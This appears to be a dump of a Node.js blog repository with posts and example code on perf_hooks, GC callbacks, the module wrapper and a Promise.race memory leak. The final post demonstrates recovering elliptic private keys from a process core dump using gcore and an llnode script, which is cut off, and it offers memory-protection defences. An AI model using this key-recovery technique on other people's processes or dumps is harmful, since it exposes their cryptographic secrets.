Full code available in [examples/mark-measure.js](./examples/mark-measure.js)

#### function

Instead of using `mark` & `measure` for synchronous functions we can use `timerify`, which produces the `function` entry type. This is valid only for synchronous functions; for async ones we still need `mark`/`measure`.

`timerify` caches the resulting function as a property on the original function, so each time we get the same object: [perf_hooks.js#L415-L423](https://github.com/nodejs/node/blob/v12.10.0/lib/perf_hooks.js#L415-L423).
Under the hood the code simply takes the current time before and after the original function call, so this should be faster than `mark` & `measure`: [node_perf.cc#L322-L338](https://github.com/nodejs/node/blob/v12.10.0/src/node_perf.cc#L322-L338).

```js
{"name":"doSomeWork","entryType":"function","startTime":34.94268,"duration":65.832449}
```

Full code available in [examples/function.js](./examples/function.js)

#### http

The HTTP Server in Node.js uses `perf_hooks` for emitting the duration of handling an HTTP request. The duration is the time between creating the ServerResponse and the `ServerResponse#_finish` call. In the source: [lib/\_http_server.js#L161-L175](https://github.com/nodejs/node/blob/v12.10.0/lib/_http_server.js#L161-L175) & [lib/internal/http.js#L31-L45](https://github.com/nodejs/node/blob/v12.10.0/lib/internal/http.js#L31-L45). Because `perf_hooks` does this work only when observers for `http` are added, this code should add zero overhead to an HTTP Server without such observers.

```js
{"name":"HttpRequest","entryType":"http","duration":0.740417,"startTime":215104781.282011}
```

Full code available in [examples/http.js](./examples/http.js)

#### http2

HTTP2 is more complex than HTTP. In [http2](https://nodejs.org/docs/v12.10.0/api/http2.html) we have [Http2Session](https://nodejs.org/docs/v12.10.0/api/http2.html#http2_class_http2session) and [Http2Stream](https://nodejs.org/docs/v12.10.0/api/http2.html#http2_class_http2stream); one Session can have many Streams. An observer subscribed to `http2` will get an entry for each Session and Stream. While the `http` type is currently available only for ServerResponse, the `http2` type is available for both client and server.

The Node.js docs also have a good description of the fields of such entries: https://nodejs.org/docs/v12.10.0/api/http2.html#http2_collecting_http_2_performance_metrics

```js
{"name":"Http2Stream","entryType":"http2","startTime":56.851517,"duration":3.810295,"id":1,"timeToFirstByte":0,"timeToFirstHeader":226649758.667291,"timeToFirstByteSent":226649761.046063,"bytesWritten":2,"bytesRead":0}
{"name":"Http2Stream","entryType":"http2","startTime":56.303171,"duration":4.960001,"id":1,"timeToFirstByte":0,"timeToFirstHeader":226649762.293621,"timeToFirstByteSent":0,"bytesWritten":0,"bytesRead":2}
{"name":"Http2Session","entryType":"http2","startTime":55.990767,"duration":5.992484,"type":"client","pingRTT":0,"framesReceived":5,"framesSent":5,"streamCount":1,"streamAverageDuration":4.960001,"bytesWritten":100,"bytesRead":72,"maxConcurrentStreams":1}
{"name":"Http2Session","entryType":"http2","startTime":55.001057,"duration":9.796909,"type":"server","pingRTT":0,"framesReceived":4,"framesSent":7,"streamCount":1,"streamAverageDuration":3.810295,"bytesWritten":106,"bytesRead":100,"maxConcurrentStreams":1}
```

Full code available in [examples/http2.js](./examples/http2.js)

#### gc

Probably the hardest entry type to understand is `gc`. By hard I mean understanding what the field [kind](https://nodejs.org/docs/v12.10.0/api/perf_hooks.html#perf_hooks_performanceentry_kind) means.

The `NODE_PERFORMANCE_GC_*` constants map to V8's `GCType` values: [src/node_perf.h#L104-L109](https://github.com/nodejs/node/blob/v12.10.0/src/node_perf.h#L104-L109).
Currently with values:

- `NODE_PERFORMANCE_GC_MAJOR` = `GCType::kGCTypeMarkSweepCompact` = 2
- `NODE_PERFORMANCE_GC_MINOR` = `GCType::kGCTypeScavenge` = 1
- `NODE_PERFORMANCE_GC_INCREMENTAL` = `GCType::kGCTypeIncrementalMarking` = 4
- `NODE_PERFORMANCE_GC_WEAKCB` = `GCType::kGCTypeProcessWeakCallbacks` = 8

From the names it's obvious that `MAJOR` is a gc run for the old generation and `MINOR` a gc run for the young generation. The Garbage Collector uses marking to check which objects are alive, but running marking on a big heap is like stopping the world for a few hundred milliseconds; because of this, `INCREMENTAL` marking was implemented, which splits marking into a set of small steps (see details in [A tour of V8: Garbage Collection](http://jayconrod.com/posts/55/a-tour-of-v8-garbage-collection) — `Incremental marking and lazy sweeping`). Finally, the last `gc` kind is `WEAKCB`: when, in an addon, we make an Object derived from `PersistentBase` weak with a `SetWeak` call, we can pass a callback which will be called when the Object is Garbage Collected. The thing is that no other V8 API can be called in this callback, so we can set another (second) callback which will be called later — this produces `WEAKCB`. See [SetSecondPassCallback](https://github.com/nodejs/node/blob/v12.10.0/deps/v8/include/v8.h#L421-L427) in `v8.h`.

```js
MyStructCallback1
{"name":"gc","entryType":"gc","startTime":54.537262,"duration":0.237857,"kind":1}
{"name":"gc","entryType":"gc","startTime":55.275977,"duration":0.021478,"kind":4}
MyStructCallback2
{"name":"gc","entryType":"gc","startTime":57.155068,"duration":0.383058,"kind":2}
{"name":"gc","entryType":"gc","startTime":63.663558,"duration":0.061706,"kind":4}
{"name":"gc","entryType":"gc","startTime":66.752791,"duration":0.655389,"kind":2}
{"name":"gc","entryType":"gc","startTime":67.479331,"duration":0.000318,"kind":8}
```

Full code available in [examples/gc.js](./examples/gc.js)

This example also requires building an addon, because without it we cannot get the `NODE_PERFORMANCE_GC_WEAKCB` gc kind. We also need to run the script with the flags `--expose-gc` & `--stress-incremental-marking`, because we need `global.gc` for Scavenge and we need to force `NODE_PERFORMANCE_GC_INCREMENTAL` without a big heap size. The order of GC calls can be different for you, but you should see each kind.
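The numeric `kind` values can be decoded with the constants exported by the module itself; a small helper sketch (the constant names are those listed above):

```js
const { constants } = require('perf_hooks')

// map a numeric entry.kind back to a readable name
const kindNames = {
  [constants.NODE_PERFORMANCE_GC_MAJOR]: 'major (Mark-Sweep-Compact)',
  [constants.NODE_PERFORMANCE_GC_MINOR]: 'minor (Scavenge)',
  [constants.NODE_PERFORMANCE_GC_INCREMENTAL]: 'incremental marking',
  [constants.NODE_PERFORMANCE_GC_WEAKCB]: 'weak callbacks'
}

// e.g. inside a PerformanceObserver callback:
// console.log(kindNames[entry.kind], entry.duration)
```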
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/binding.gyp: --------------------------------------------------------------------------------
{
  "targets": [
    {
      "target_name": "gcweak",
      "cflags!": [ "-fno-exceptions" ],
      "cflags_cc!": [ "-fno-exceptions" ],
      "sources": [ "gcweak.cc" ],
      'defines': [ 'NAPI_DISABLE_CPP_EXCEPTIONS' ],
    }
  ]
}
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/function.js: --------------------------------------------------------------------------------
const { performance, PerformanceObserver } = require('perf_hooks')

const obs = new PerformanceObserver((items) => {
  const entry = items.getEntries()[0]
  console.log(JSON.stringify(entry))
  obs.disconnect()
})
obs.observe({ entryTypes: ['function'] })

function doSomeWork () {
  for (let i = 0; i < 1e8; ++i);
}

performance.timerify(doSomeWork)()
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/gc.js: --------------------------------------------------------------------------------
const { PerformanceObserver } = require('perf_hooks')

const obs = new PerformanceObserver((items) => {
  const entry = items.getEntries()[0]
  console.log(JSON.stringify(entry))
})
obs.observe({ entryTypes: ['gc'] })

const gcweak = require('bindings')('gcweak')
gcweak.fn1.call({})

global.gc(true)

setTimeout(() => {}, 50)
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/gcweak.cc: --------------------------------------------------------------------------------
#include <node.h>

struct MyStruct {
  v8::Global<v8::Object> wrapper;
};

// v8.h line 427
void MyStructCallback2(const v8::WeakCallbackInfo<MyStruct>& data) {
  printf("MyStructCallback2\n");
}

void MyStructCallback1(const v8::WeakCallbackInfo<MyStruct>& data) {
  printf("MyStructCallback1\n");
  data.GetParameter()->wrapper.Reset();
  delete data.GetParameter();
  data.SetSecondPassCallback(MyStructCallback2);
}

void Method(const v8::FunctionCallbackInfo<v8::Value>& args) {
  v8::Isolate* isolate = args.GetIsolate();
  v8::Local<v8::Context> context = isolate->GetCurrentContext();

  MyStruct* ptr = new MyStruct();
  ptr->wrapper.Reset(isolate, args.This());
  ptr->wrapper.SetWeak(ptr, MyStructCallback1, v8::WeakCallbackType::kParameter);
  v8::Local<v8::External> external = v8::External::New(isolate, ptr);

  v8::Local<v8::Object> obj = v8::Object::New(isolate);
  v8::Local<v8::String> key = v8::String::NewFromUtf8(isolate, "obj", v8::NewStringType::kNormal).ToLocalChecked();
  obj->Set(context, key, external).FromJust();
  args.GetReturnValue().Set(obj);
}

void Initialize(v8::Local<v8::Object> exports, v8::Local<v8::Value> module, void* context) {
  NODE_SET_METHOD(exports, "fn1", Method);
}

NODE_MODULE(NODE_GYP_MODULE_NAME, Initialize)
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/http.js: --------------------------------------------------------------------------------
const http = require('http')
const { PerformanceObserver } = require('perf_hooks')

const obs = new PerformanceObserver((items) => {
  const entry = items.getEntries()[0]
  console.log(JSON.stringify(entry))
})
obs.observe({ entryTypes: ['http'] })

const server = http.createServer((req, res) => res.end('ok')).listen(8000)
server.once('listening', () => {
  http.request('http://localhost:8000/')
    .on('data', () => {})
    .once('close', () => server.close())
    .end()
})
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/http2.js: --------------------------------------------------------------------------------
const http2 = require('http2')
const { PerformanceObserver } = require('perf_hooks')

const obs = new PerformanceObserver((items) => {
  const entry = items.getEntries()[0]
  console.log(JSON.stringify(entry))
})
obs.observe({ entryTypes: ['http2'] })

const server = http2.createServer({}, (req, res) => res.end('ok')).listen(8000)
server.once('listening', () => {
  const client = http2.connect('http://localhost:8000')
  client
    .request()
    .on('data', () => {})
    .once('close', () => client.close())
    .once('close', () => server.close())
    .end()
})
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/mark-measure.js: --------------------------------------------------------------------------------
const { performance, PerformanceObserver } = require('perf_hooks')

const obs = new PerformanceObserver((items) => {
  const entry = items.getEntries()[0]
  console.log(JSON.stringify(entry))

  if (entry.entryType === 'measure') {
    obs.disconnect()
    performance.clearMarks('A')
    performance.clearMarks('B')
  }
})
obs.observe({ entryTypes: ['mark', 'measure'] })

function doSomeWork () {
  for (let i = 0; i < 1e8; ++i);
}

;(async () => {
  performance.mark('A')
  doSomeWork()
  performance.mark('B')
  performance.measure('A to B', 'A', 'B')
})().catch((err) => {
  console.error(err.stack || err)
  process.exit(1)
})
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/node.js: --------------------------------------------------------------------------------
const { performance } = require('perf_hooks')

process.on('exit', () => console.log(performance.nodeTiming))
process.nextTick(() => {})
-------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/examples/package.json: --------------------------------------------------------------------------------
{
  "name": "perf_hooks-examples",
  "version": "0.0.1",
  "dependencies": {
    "bindings": "^1.5.0",
    "node-gyp": "^5.0.3"
  },
  "private": true,
  "gypfile": true
}
-------------------------------------------------------------------------------- /2019-09-21-node-object-gc-callback/README.md: --------------------------------------------------------------------------------

# Node.js: callback when object Garbage Collected

In JavaScript we do not control object lifetimes; instead the Garbage Collector removes unused objects for us. The JavaScript engine tracks references to objects; once an object becomes unreachable it is marked for removal.
If you are not familiar with memory management in JS, you can check [Memory Management on mdn](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Memory_Management) as a start. One important note here: once an object is marked for removal, it does not mean that memory will be released immediately. This only happens when Garbage Collection runs and the engine needs memory for allocating new objects (or wants to reduce the memory footprint).

But even though objects are removed by the Garbage Collector, we can still be notified about it; unfortunately this is only available in [Node.js](https://nodejs.org/) with [C++ addons](https://nodejs.org/api/addons.html).

### MakeWeak and SetWeak

The first concept of this kind was developed by [Ben Noordhuis](https://github.com/bnoordhuis) as a solution for [Node.js issue 631](https://github.com/joyent/node/issues/631) -- https://github.com/bnoordhuis/node-weakref

The solution was to create a persistent object which holds a reference to the original object and to call the method [MakeWeak](https://v8docs.nodesource.com/node-0.10/d2/d78/classv8_1_1_persistent.html#a5610d667bc793ba0af838bb134941bec) ([code in node-weakref](https://github.com/bnoordhuis/node-weakref/blob/18b6eca1408ff8c86a1d772aba2df0870ea5d27a/src/weakref.cc#L138-L146)). `MakeWeak` requires a callback as its second argument, which will be called when, during gc work, only the _weak_ object still references the original object. `MakeWeak` is now a private API method, so we cannot use this approach anymore.

Ben provided the concept, but [Nathan Rajlich (TooTallNate)](https://github.com/TooTallNate) started to maintain it in [node-weak](https://github.com/TooTallNate/node-weak). The idea stayed the same, except that [SetWeak](https://v8docs.nodesource.com/node-12.0/d4/dca/classv8_1_1_persistent_base.html#a9a1e1d92935d6fac29091cff63592854) is now used instead of `MakeWeak` (see the call [in the code](https://github.com/TooTallNate/node-weak/blob/f222cf78a7d9522cafc60a4f15cf48ebaf7ed3a0/src/weakref.cc#L187)). `SetWeak` has an awesome NOTE:

> There is no guarantee as to when or even if the callback is invoked. The invocation is performed solely on a best effort basis. As always, GC-based finalization should not be relied upon for any critical form of resource management!

For example, if your application which uses [V8](https://v8.dev/) (usually Node.js) does not manually remove objects after the event loop stops, then the callback passed to `SetWeak` will never be called.

Also, `SetWeak` may potentially make your application crash, because it calls JS code in the callback, while the right approach is to call [SetSecondPassCallback](https://v8docs.nodesource.com/node-12.0/d8/d06/classv8_1_1_weak_callback_info.html#a63750d6bc85beb6a093deb7ca0c4c1bf), as the [v8 documentation recommends](https://v8docs.nodesource.com/node-12.0/d4/da0/v8_8h_source.html#l00420).

### WeakMap

While `SetWeak` is still a working solution, the newer approach from [Anna Henningsen](https://github.com/addaleax) implemented in [weak-napi](https://github.com/node-ffi-napi/weak-napi) looks much better.

First, the new approach uses [N-API](https://nodejs.org/api/n-api.html), which does not require rebuilding the bindings every time the V8 version in Node changes. Second, instead of `SetWeak` a native `WeakMap` is used, which means 1) the callback will be called at a suitable time (no potentially crashed applications) 2) native primitives are used.

So, how is it possible to track that an object was garbage collected with a native `WeakMap`?
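Before the detailed walkthrough, a rough sketch of the idea in pseudo-JS (`makeNativeHolder` and `makeProxy` are hypothetical stand-ins for what the addon actually does in C++):

```js
// pseudo-code of the weak-napi idea, not the real implementation
const registry = new WeakMap()

function weak (obj, onDead) {
  // a native holder whose C++ destructor triggers OnFree -> onDead
  const holder = makeNativeHolder(onDead)
  // the WeakMap entry keeps the holder alive exactly as long as obj is alive
  registry.set(obj, holder)
  // hand out access to obj without keeping an extra strong reference around
  return makeProxy(obj)
}
```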
First, in the C++ bindings a persistent function and an [ObjectReference](https://github.com/nodejs/node-addon-api/blob/master/doc/object_reference.md) store the dead callback and the original object. The resulting object is passed to a [Proxy](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Proxy); as a result we can still access the original object without storing any references to it. For this newly created object the module creates a small object in C++ which will call [`OnFree`](https://github.com/node-ffi-napi/weak-napi/blob/v1.0.3/src/weakref.cc#L53) on destruction. `OnFree` itself calls the passed callback, which means that the original object was garbage collected. This last object is stored as a value in a global `WeakMap` where the key is the original object.

All this works because once the original object is garbage collected, the value can be removed. Once the value is removed, the destructor of the C++ object is called and it calls `OnFree` in its turn. `OnFree` calls the dead callback, and now in JS we know that our object was garbage collected. It's a really great idea to use all this stuff together.

As an example, this script can be tested:

```js
// node --expose-gc index.js
const weak = require('weak-napi')

const obj = {}
const ref = weak(obj, () => {
  console.log('"obj" has been garbage collected!')
})

setTimeout(() => {
  global.gc()
}, 100)
```

and the result:
```bash
"obj" has been garbage collected!
```
-------------------------------------------------------------------------------- /2019-09-23-node-module-wrapper/README.md: --------------------------------------------------------------------------------

# Module wrapper in Node.js

In all these years of coding in JavaScript I had never thought about what `require` / `module` / `__filename` / `__dirname` are in [Node.js](https://nodejs.org/). They just work. I knew that I can export things through the `exports` Object or redefine it with `module.exports`, knew that `__filename` is the path to the current file and `__dirname` is the directory of `__filename`. In addition to `require` I sometimes used the function `resolve`. That's all. Looking at the past now I think it's a shame, but we cannot know everything and we keep learning all the time. In this short note I'd like to share my new knowledge.

First we can start from the [Node.js Documentation](https://nodejs.org/api/documentation.html): while we use it all the time for checking how different functions work, some topics can be ignored because they are not required for our current tasks. Modules can be one of such topics, but they are actually described in the docs: https://nodejs.org/api/modules.html

Why modules? Because each file in Node.js is treated as a separate module. The modules documentation has an interesting section, [The module wrapper](https://nodejs.org/api/modules.html#modules_the_module_wrapper), from which we can learn that the code in files is wrapped in a function wrapper:

```js
(function(exports, require, module, __filename, __dirname) {
// Module code actually lives in here
});
```

Now it's clear why global variables defined in files are not available from other files. The wrapping code in Node.js is defined in [cjs/loader.js#L859-L868](https://github.com/nodejs/node/blob/v12.10.0/lib/internal/modules/cjs/loader.js#L859-L868). The wrapped code is compiled with the [vm](https://nodejs.org/api/vm.html) module, but this happens only if a certain `patched` variable is set to `true`.
Otherwise `CompileFunctionInContext` from V8 is used. 16 | 17 | Not only is `wrap` exported through `module.wrap`, but also the lines of the wrapping function, as the variable `wrapper`. This is better explained by the code itself: [cjs/loader.js#L180-L200](https://github.com/nodejs/node/blob/v12.10.0/lib/internal/modules/cjs/loader.js#L180-L200). You can also see there that `patched` is changed to `true` once we change `wrap` or `wrapper`. 18 | 19 | We can change both `wrap` and `wrapper`; for example, we can measure how much time is required to execute the code in a file: 20 | 21 | ```js 22 | const mod = require('module') 23 | mod.wrapper[0] = mod.wrapper[0] + 'require("perf_hooks").performance.mark(__filename + "_start");' 24 | mod.wrapper[1] = 'require("perf_hooks").performance.mark(__filename + "_end");require("perf_hooks").performance.measure(__filename, __filename + "_start", __filename + "_end");' + mod.wrapper[1] 25 | 26 | const { performance, PerformanceObserver } = require('perf_hooks') 27 | const observer = new PerformanceObserver((items) => { 28 | const entry = items.getEntries()[0] 29 | console.log(`${entry.entryType} => ${entry.duration}`) 30 | }); 31 | observer.observe({ entryTypes: ['measure', 'function'] }) 32 | 33 | performance.timerify(require)('./some-file') 34 | ``` 35 | 36 | where `some-file.js` can be: 37 | 38 | ```js 39 | const http = require('http') 40 | ``` 41 | 42 | the result on my machine: 43 | 44 | ```bash 45 | measure => 3.841967 46 | function => 8.28471 47 | ``` 48 | 49 | `measure` shows how much time was needed to execute the code in the file, while `function` shows the total time spent by `require`. 50 | 51 | Another example is modifying `wrapper` in such a way that all code is executed in strict mode: [isaacs/use-strict](https://github.com/isaacs/use-strict) 52 | -------------------------------------------------------------------------------- /2019-09-27-node-promise-leaking/README.md: -------------------------------------------------------------------------------- 1 | # Why you should not leave promises in pending state in Node.js 2 | 3 | I think in 2019 nobody needs an explanation of what a [Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise) is, how they should be used, why they were introduced, and so on. 4 | 5 | I never knew how Promises are implemented in V8, and I tried to implement something like [Go context](https://golang.org/pkg/context/) in [Node.js](https://nodejs.org/), but this was not successful. In the end I found a memory leak in my application and decided to learn how Promises work in V8, so I started reading the source code. 6 | 7 | ### Simple loop and memory leak 8 | 9 | In the server-side application which I worked on for \~1.5 years I used the idea of an *active* promise, which is not resolved while the application is working and is resolved when `SIGINT` or `SIGTERM` is received. As a result, all loops or processes that depend on this *promise* finish and the application shuts down gracefully.
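A minimal sketch of such an *active* promise could look like this (the names here are mine, not from the original application):

```js
// Resolved only when the process is asked to stop.
function createActivePromise () {
  return new Promise((resolve) => {
    process.once('SIGINT', resolve)
    process.once('SIGTERM', resolve)
  })
}

const activePromise = createActivePromise()
```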
For this I used [Promise.race](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise/race), and the loop function looked like: 10 | 11 | ```js 12 | function diffTime (time) { 13 | if (time === undefined) return process.hrtime() 14 | 15 | const diff = process.hrtime(time) 16 | return diff[0] * 1e3 + diff[1] / 1e6 17 | } 18 | 19 | function delay (ms) { 20 | return new Promise((resolve) => setTimeout(resolve, ms)) 21 | } 22 | 23 | async function startLoop (fn, activePromise, intervalMax, failsBeforeMax) { 24 | const interval = Math.ceil(intervalMax / Math.pow(2, failsBeforeMax)) 25 | const sym = Symbol('active deferred') 26 | 27 | for (let loopInterval = interval; ;) { 28 | const ts = diffTime() 29 | 30 | try { 31 | const result = await Promise.race([activePromise.then(() => sym), fn()]) 32 | switch (result) { 33 | case sym: return 34 | case undefined: loopInterval = interval; break 35 | case null: return 36 | default: loopInterval = result 37 | } 38 | } catch (err) { 39 | loopInterval = Math.min(loopInterval * 2, intervalMax) 40 | } 41 | 42 | const sleepTime = loopInterval - diffTime(ts) 43 | if (sleepTime > 0) await Promise.race([activePromise, delay(sleepTime)]) 44 | } 45 | } 46 | ``` 47 | 48 | As you can see from the `startLoop` function, `activePromise` can be used twice, in two different `Promise.race` calls, per iteration. In the first *race* we call `activePromise.then()`, i.e. create a new `Promise` from `activePromise` which will be resolved with `sym`. And this happens on each iteration. 49 | 50 | The service worked with this loop for a long time, but when I tried to implement a context package for public usage I went carefully through the code and realized that each time I add a resolve function to a `Promise` which will never be resolved. What does this mean? It means that our objects grow endlessly. It means that with each iteration the application has less and less memory for other objects, and in the end it can fail with `out of memory`. 51 | 52 | ### We need to go deeper 53 | 54 | Then I thought: how do *Promises* work in V8? Is `Promise.race` safe to use? Maybe there are some hacks which I can use? 55 | 56 | First I needed to find where `Promise` is built in V8; this is done in [src/init/bootstrapper.cc#L2298](https://github.com/nodejs/node/blob/v12.11.0/deps/v8/src/init/bootstrapper.cc#L2298). Here are the `Promise.race` lines: 57 | 58 | ```cpp 59 | InstallFunctionWithBuiltinId(isolate_, promise_fun, "race", 60 | Builtins::kPromiseRace, 1, true); 61 | ``` 62 | 63 | As we see, *Builtins* are used. What are they? *Builtins* are chunks of code executable by the VM at runtime. Thanks to the V8 devs, there is a good article about them: [CodeStubAssembler builtins](https://v8.dev/docs/csa-builtins). 64 | 65 | Promise-related builtins are defined in a separate file, [src/builtins/builtins-promise-gen.cc](https://github.com/nodejs/node/blob/v12.11.0/deps/v8/src/builtins/builtins-promise-gen.cc), with `race` on lines [#L2575-L2706](https://github.com/nodejs/node/blob/v12.11.0/deps/v8/src/builtins/builtins-promise-gen.cc#L2575-L2706). 66 | 67 | There is a lot of code, and if you are looking at CSA for the first time it will probably not be clear. But all this code follows the spec: [Promise.race in ECMA-262](https://tc39.es/ecma262/#sec-promise.race). 68 | 69 | In short, it works like this: `Promise.race` creates a new `Promise` and receives its `resolve` and `reject` functions. Then it goes through the iterable object which was passed, passes each iterated value to `Promise.resolve`, and then calls `.then` on the result, passing `resolve` and `reject` to it.
In rough pseudocode this looks like: 70 | 71 | ```js 72 | function promiseRace (promises) { 73 | return new Promise((resolve, reject) => { 74 | for (const promise of promises) { 75 | Promise.resolve(promise).then(resolve, reject) 76 | } 77 | }) 78 | } 79 | ``` 80 | 81 | Do you see the problem? We call `then` for each promise. On each `Promise.race` V8 calls `then`. So if your promise is never *resolved* or *rejected* and cannot be collected by GC, you get a memory leak with native `Promise.race`. Sounds crazy, but it's the reality. 82 | 83 | As an example of this problem you can run the following code: 84 | 85 | ```js 86 | let resolveUnresolved 87 | const unresolved = new Promise((r) => { resolveUnresolved = r }) 88 | const resolved = Promise.resolve(42) 89 | 90 | setInterval(() => { 91 | for (let i = 0; i < 1e5; ++i) { 92 | Promise.race([unresolved, resolved]) 93 | } 94 | 95 | // const { heapUsed } = process.memoryUsage() 96 | // if (heapUsed > 500 * 1024 * 1024) resolveUnresolved() 97 | }, 100) 98 | ``` 99 | 100 | Better run it with `--trace-gc`; with tracing you will see how often GC is called and how the heap size changes after GC. In the end you will get `out of memory`. 101 | 102 | If you uncomment the two lines which cause the promise to resolve, then the nearest `Mark-sweep` GC call will decrease the heap size to a normal value and the application will never fail. 103 | 104 | ### Epilog 105 | 106 | While promises made our code easier to write and understand, other kinds of problems were introduced (which, in this case, depend on the implementation!). Make sure that you always resolve your promises, or that they can be garbage collected. 107 | 108 | And read the source code! Where else can you find out, for example, that `Promise.all` has a limit of [2\*\*21-1](https://github.com/nodejs/node/blob/v12.11.0/deps/v8/src/builtins/builtins-promise-gen.cc#L2201-L2207) elements? 109 | -------------------------------------------------------------------------------- /2019-12-18-llnode-elliptic/README.md: -------------------------------------------------------------------------------- 1 | # JavaScript, sometimes, is not your friend 2 | 3 | Everybody knows that JavaScript has a Garbage Collector. On one side this is a great feature which allows us to write code faster; on the other side, we cannot control memory manually. This can have some unpleasant consequences, for example with cryptography operations. How many people have thought about what happens to the objects where they kept sensitive data? 4 | 5 | ### elliptic and llnode 6 | 7 | [indutny/elliptic](https://github.com/indutny/elliptic) is a great library, really. It is used in a lot of applications and, by [npmjs](https://www.npmjs.com/package/elliptic) stats, has more than 7M downloads per week! 8 | 9 | So it will be good to show how some private keys can be recovered. For this we will use [nodejs/llnode](https://github.com/nodejs/llnode), which is a C++ plugin for the LLDB debugger. `llnode` currently does not work on node@12, so you need to use 10 or lower. 10 | 11 | For the demo I created a small HTTP server ([server.js](server.js)), which on each request: 12 | 13 | - [generates a random KeyPair](https://github.com/indutny/elliptic/blob/v6.5.2/lib/elliptic/ec/index.js#L54) 14 | - prints the private and public keys to stdout 15 | - sends the public key to the client 16 | - calls `setTimeout(global.gc, 100)` for collecting unused objects 17 | 18 | From the code it looks like the KeyPair should be collected by GC and nothing should be left in the Node.js heap. But let's check!
19 | 20 | You can run the server with this command (of course, you need to install the dependencies first: `yarn install`): 21 | 22 | ```bash 23 | $ node --expose-gc server.js 24 | ``` 25 | 26 | and now you can make a few requests to `localhost:8000`: 27 | 28 | ```bash 29 | $ for (( a = 1; a < 10; a++ )); do curl localhost:8000; done 30 | ``` 31 | 32 | As a result you will see something like this in the stdout of `server.js`: 33 | 34 | ```bash 35 | Server at localhost:8000 (pid: 10321) 36 | b5d9d042530476b0d732e75cab8a209d544a3fad4a5d9dd3d8e321232eb2c065 => 038274d363bc754ddd7ed21b295945363e01e4d85e8de983addc6818073d6935c4 37 | 5dc10a253e6de5abaad396aa460f6a27f4af6400602c7e59978fb5a02a6d2ffc => 025f6cb9747ada6fc7c81c2baa68e47f088a9161bca806773b0dba3bcdc1259803 38 | ... 39 | d924065526f565c7902737459adb621cbfd6f113849b9a85056c9e80d81e5ac4 => 0310baa0d3c4375e8407941812f6ed88b029867ea76b33dfea0d25a58fb5727c98 40 | ``` 41 | 42 | and only the public keys in the terminal where cURL was called: 43 | 44 | ```bash 45 | 038274d363bc754ddd7ed21b295945363e01e4d85e8de983addc6818073d6935c4 46 | 025f6cb9747ada6fc7c81c2baa68e47f088a9161bca806773b0dba3bcdc1259803 47 | ... 48 | 0310baa0d3c4375e8407941812f6ed88b029867ea76b33dfea0d25a58fb5727c98 49 | ``` 50 | 51 | Now we need to generate a core file with [gcore](http://man7.org/linux/man-pages/man1/gcore.1.html): 52 | 53 | ```bash 54 | $ gcore 10321 55 | [New LWP 10322] 56 | [New LWP 10323] 57 | [New LWP 10324] 58 | [New LWP 10325] 59 | [New LWP 10326] 60 | [New LWP 10327] 61 | [Thread debugging using libthread_db enabled] 62 | Using host libthread_db library "/lib64/libthread_db.so.1". 63 | 0x00007f995ca692c6 in epoll_pwait () from /lib64/libc.so.6 64 | warning: target file /proc/10321/cmdline contained unexpected null characters 65 | Saved corefile core.10321 66 | [Inferior 1 (process 10321) detached] 67 | ``` 68 | 69 | Great, now we can try to find the private keys by the public keys. It's very simple; all you need is to run the [llnode.js](llnode.js) script: 70 | 71 | ```bash 72 | $ node llnode.js core.10321 038274d363bc754ddd7ed21b295945363e01e4d85e8de983addc6818073d6935c4 73 | Found 0 KeyPair instances. 74 | Found 970 BN instances. 75 | $ node llnode.js core.10321 0310baa0d3c4375e8407941812f6ed88b029867ea76b33dfea0d25a58fb5727c98 76 | Found 0 KeyPair instances. 77 | Found 970 BN instances. 78 | Found private key for given public key! 79 | d924065526f565c7902737459adb621cbfd6f113849b9a85056c9e80d81e5ac4 => 0310baa0d3c4375e8407941812f6ed88b029867ea76b33dfea0d25a58fb5727c98 80 | ``` 81 | 82 | Yes, GC removed all keys except the last one, but we forced this call. Do we always call `global.gc()` when we do not need sensitive data anymore? 83 | 84 | Sometimes, the lack of access to memory management is bad. 85 | 86 | ### How can things be solved? 87 | 88 | In Node.js there is most likely no way to solve it. Moving data processing to an [addon](https://nodejs.org/api/addons.html) will probably help. 89 | 90 | If you only need a Buffer, a good way is to use Memory Protection from [sodium-friends/sodium-native](https://github.com/sodium-friends/sodium-native#memory-protection), which is an addon to libsodium.
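A minimal sketch of what this looks like (assuming `sodium-native` is installed; the 32-byte key here is just an example):

```js
const sodium = require('sodium-native')

// Allocated with sodium_malloc: excluded from core dumps,
// locked against swapping, and zeroed when the Buffer is freed.
const seckey = sodium.sodium_malloc(32)
sodium.randombytes_buf(seckey) // fill with random key material

// ... use the secret key ...

// Explicitly wipe it as soon as it is not needed anymore.
sodium.sodium_memzero(seckey)
```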
91 | 92 | [jedisct1/libsodium](https://github.com/jedisct1/libsodium) has [Secure memory](https://download.libsodium.org/doc/memory_management), which is a result of: 93 | 94 | - [madvise](http://man7.org/linux/man-pages/man2/madvise.2.html) with `MADV_DONTDUMP`, which excludes the memory segment from the core file 95 | - [mlock](http://man7.org/linux/man-pages/man2/mlock.2.html), which disables swapping of the memory segment 96 | - [mprotect](http://man7.org/linux/man-pages/man2/mprotect.2.html) as guard pages 97 | -------------------------------------------------------------------------------- /2019-12-18-llnode-elliptic/llnode.js: -------------------------------------------------------------------------------- 1 | const EC = require('elliptic').ec 2 | const BN = require('bn.js') 3 | // const llnode = require('llnode') 4 | const { fromCoredump } = require('../../llnode') 5 | 6 | const secp256k1 = new EC('secp256k1') 7 | const knownPubKey = process.argv[3] 8 | 9 | // zero item path to node 10 | // second item path to coredump 11 | const llnode = fromCoredump(process.argv[2], process.argv[0]) 12 | const types = llnode.getHeapTypes() 13 | 14 | const keyPairHeapType = types.filter(({ typeName }) => typeName === 'KeyPair')[0] 15 | console.log(`Found ${keyPairHeapType ? keyPairHeapType.instanceCount : 0} KeyPair instances.`) 16 | 17 | const bnHeapType = types.filter(({ typeName }) => typeName === 'BN')[0] 18 